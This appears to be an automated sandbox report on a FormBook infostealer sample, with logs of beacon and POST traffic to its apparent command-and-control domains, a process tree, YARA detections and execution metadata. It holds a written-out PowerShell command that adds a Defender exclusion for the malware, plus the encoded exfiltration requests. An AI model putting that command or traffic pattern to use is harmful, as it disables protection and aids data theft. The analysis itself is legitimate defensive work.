                                                          Sep 11, 2024 22:06:23.200354099 CEST | 457 | OUT | GET /o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:06:23.711595058 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:23 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:23.712097883 CEST | 219 | IN |
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          45 | 192.168.2.10 | 49753 | 47.239.13.172 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:29.481215954 CEST | 725 | OUT | POST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=6Fpigt4lTylTP2OfPoHg3fk2blpofVsM45oNdycBTLZFEWByx5sRSR2L3FoSOhGovjBpUxVu4rXQvY8w3kK6oaznQd7jHOr/bJOgwowww9kQ7+Ep8UwrQCNhYZGD4H6Ffz90EBdXRhWgrycRgiEjxoTvrY0s9hQdu2v+ECSoNKqossRuGtMKAGthwcJz
                                                          Sep 11, 2024 22:06:30.426184893 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:30 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          46 | 192.168.2.10 | 49754 | 47.239.13.172 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:32.013145924 CEST | 749 | OUT | POST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX=6Fpigt4lTylTVX+fDvTgy/k5XFpoJlsA450NdwwRT49FEz9y2LIRTR2Lv1oXNRGvvjdbU1Ru4qzQva0w33S1uazlf97laer/bJOgwpVtw+UQ6OUp91w0TCNmfZGD8H7Mfz9GEAwfRi+gr3gRgw8i/oTh0o0yxwl4oVT5MSf8Z4+IrNwpX8tdTxxv+a8Z6LJgjeoCYpw51XoQ2r5NLQ==
                                                          Sep 11, 2024 22:06:32.913976908 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:32 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          47 | 192.168.2.10 | 49755 | 47.239.13.172 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:34.544626951 CEST | 1762 | OUT | POST /d8su/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Origin: http://www.trcrb8e8m.sbs
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.trcrb8e8m.sbs/d8su/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Ascii: bFGXGTdX= [TRUNCATED]
                                                          Sep 11, 2024 22:06:35.474220991 CEST | 165 | IN | HTTP/1.1 405 Not Allowed
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:35 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          48 | 192.168.2.10 | 49756 | 47.239.13.172 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 11, 2024 22:06:37.075231075 CEST | 460 | OUT | GET /d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.trcrb8e8m.sbs
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:06:37.962395906 CEST | 224 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 11 Sep 2024 20:06:37 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 2
                                                          Last-Modified: Tue, 26 Mar 2024 07:31:39 GMT
                                                          Connection: close
                                                          ETag: "660279db-2"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 31 0a
                                                          Data Ascii: 1


                                                          Target ID:0
                                                          Start time:16:02:09
                                                          Start date:11/09/2024
                                                          Path:C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe"
                                                          Imagebase:0x23e06540000
                                                          File size:3'079'318 bytes
                                                          MD5 hash:EE557BE5D5E16D9EA01241F09A19A87B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1462696437.0000023E0853C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
                                                          Imagebase:0x7ff7b2bb0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff620390000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:16:02:14
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:16:02:15
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\WerFault.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
                                                          Imagebase:0x7ff745f20000
                                                          File size:570'736 bytes
                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:16:02:18
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff6616b0000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:16:02:23
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe"
                                                          Imagebase:0x6c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:12
                                                          Start time:16:02:24
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\SysWOW64\SecEdit.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\SecEdit.exe"
                                                          Imagebase:0x9a0000
                                                          File size:37'888 bytes
                                                          MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:14
                                                          Start time:16:02:37
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe"
                                                          Imagebase:0x6c0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:15
                                                          Start time:16:02:42
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:16:02:43
                                                          Start date:11/09/2024
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          Imagebase:0x7ff7ca230000
                                                          File size:71'680 bytes
                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:16:02:50
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\Windows Mail\wab.exe"
                                                          Imagebase:0xbf0000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:16:02:54
                                                          Start date:11/09/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff613480000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:12.2%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:3
                                                            Total number of Limit Nodes:0
                                                            execution_graph 13849 7ff7c023587a 13850 7ff7c0235889 VirtualProtect 13849->13850 13852 7ff7c0235961 13850->13852
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467458673.00007FF7C0320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0320000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca4a08af50058be58eb01a1c7b41e8433b9ac1f3e210eabcf99042629313e43b
                                                            • Instruction ID: 459e80fb31e8e52f5f7a65226ff51a6bbad78e34ed5c29f85bfa625e008cd412
                                                            • Opcode Fuzzy Hash: ca4a08af50058be58eb01a1c7b41e8433b9ac1f3e210eabcf99042629313e43b
                                                            • Instruction Fuzzy Hash: 62C2233060CB8A4FE719EF2894815A5BBE2FF95311B4446BED48AC7296DF34F846C781
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c3b07d97734e93e2c942e0f4a0591517508a612d89a45c559b4ca4a7800da8b3
                                                            • Instruction ID: 16205334c815e71c2b567d8e01151c47246bf428cce636983d3725b40b35158f
                                                            • Opcode Fuzzy Hash: c3b07d97734e93e2c942e0f4a0591517508a612d89a45c559b4ca4a7800da8b3
                                                            • Instruction Fuzzy Hash: B272463161CA4A4FE359EF2884415B5BBE1FF95321B8046BED48AC7292DF28F846C7D1

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fish
                                                            • API String ID: 0-1064584243
                                                            • Opcode ID: 471a61617a0a8e808a0cb8d02113ca06ad9ce543e03b5c863c39a91d1cf2818c
                                                            • Instruction ID: b319e26953a2ce326052acc4b40609222de6d61497696d22c9e289e6786d8664
                                                            • Opcode Fuzzy Hash: 471a61617a0a8e808a0cb8d02113ca06ad9ce543e03b5c863c39a91d1cf2818c
                                                            • Instruction Fuzzy Hash: 0891363061CA494FD75CAF28D4595B9B7E9FF59320B40467EE48BC3292DE28F81687C1

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f7a30e286bc747b795cc04d6e5b0f3ba22fa5e961c89d2ae46030a58ee8950f
                                                            • Instruction ID: c7a055a7e74b29cd3d7588854a578fc6a2167dc320638998cec1d5738be59301
                                                            • Opcode Fuzzy Hash: 3f7a30e286bc747b795cc04d6e5b0f3ba22fa5e961c89d2ae46030a58ee8950f
                                                            • Instruction Fuzzy Hash: A582323051CB4A4FE719EF28C4844A1BBE1FF85315B5446BED48AC72A6DB38F84AC791
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 729927593d10083645932ac25ed6d3ac7288dfb0756a0f3050b9c0e38eebbdd2
                                                            • Instruction ID: 891bfa5656aec6a42307a34804bd08086d35845dd168ce2633d2ca5b05dcf9a7
                                                            • Opcode Fuzzy Hash: 729927593d10083645932ac25ed6d3ac7288dfb0756a0f3050b9c0e38eebbdd2
                                                            • Instruction Fuzzy Hash: A082253190CA864BEB599F6484412B5BFE1EF55320F9441BED48ECB6D3DB28B846C7E0

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ea92237e41b2f43c2bcc0302d25289166351fb79f8d174770b57417575c1665
                                                            • Instruction ID: 05bd41d511bfd164a979778ce560ce389f23c8745258d13d2db4a55bfac17dbe
                                                            • Opcode Fuzzy Hash: 9ea92237e41b2f43c2bcc0302d25289166351fb79f8d174770b57417575c1665
                                                            • Instruction Fuzzy Hash: 2752F930A08A194FDBA8EF28D495A79BBE1FF59311B5401BDD44EC7292DF24FC428B91

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02dd942d07857f7321a1b0b1b88c586758c5960debf9376af1839063a8e10805
                                                            • Instruction ID: 7b3600c576052c73573b8d78eafad7a1d8821ddb7ceff8fb583abf9a0b3f5f59
                                                            • Opcode Fuzzy Hash: 02dd942d07857f7321a1b0b1b88c586758c5960debf9376af1839063a8e10805
                                                            • Instruction Fuzzy Hash: 87E1773050CB464FE719DB2884951B1BBE2FF95321B5486BED4CAC72E6DA28F846C7D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 91af523431dbd7c00b17dcbbc66346ac80f5ac1fd6405dd4222ea76b5003d792
                                                            • Instruction ID: 4dd26071e9a847213edab558715e00d368187df4086322f10af11db03594590d
                                                            • Opcode Fuzzy Hash: 91af523431dbd7c00b17dcbbc66346ac80f5ac1fd6405dd4222ea76b5003d792
                                                            • Instruction Fuzzy Hash: 55516C31A0C7494FD71D9F7888551B57FA2EB83320B1482BFD49AC72D7DD24A84687D1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 945 7ff7c023587a-7ff7c0235887 946 7ff7c0235889-7ff7c0235891 945->946 947 7ff7c0235892-7ff7c02358a3 945->947 946->947 948 7ff7c02358ae-7ff7c02358b9 947->948 949 7ff7c02358a5-7ff7c02358ad 947->949 950 7ff7c02358bb-7ff7c02358e5 948->950 951 7ff7c02358e6-7ff7c023595f VirtualProtect 948->951 949->948 950->951 954 7ff7c0235967-7ff7c023598f 951->954 955 7ff7c0235961 951->955 955->954
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 33354a73beb4c8ce53b5ec5fe50d8ec112e8a209250c1b7ba218f5574456a664
                                                            • Instruction ID: 03439451bdb645b58ee7fa01dbf8d7407f8e5613b6442291e88072d27a76515d
                                                            • Opcode Fuzzy Hash: 33354a73beb4c8ce53b5ec5fe50d8ec112e8a209250c1b7ba218f5574456a664
                                                            • Instruction Fuzzy Hash: 3741193090CB884FDB199BA898466F9BFF1EF56321F0442AFD089C3193CF646856C791
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467458673.00007FF7C0320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0320000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6edfde867d52d02861dc65ed0ba90770042b8757d2a25ffa77bfc93e67bb64d6
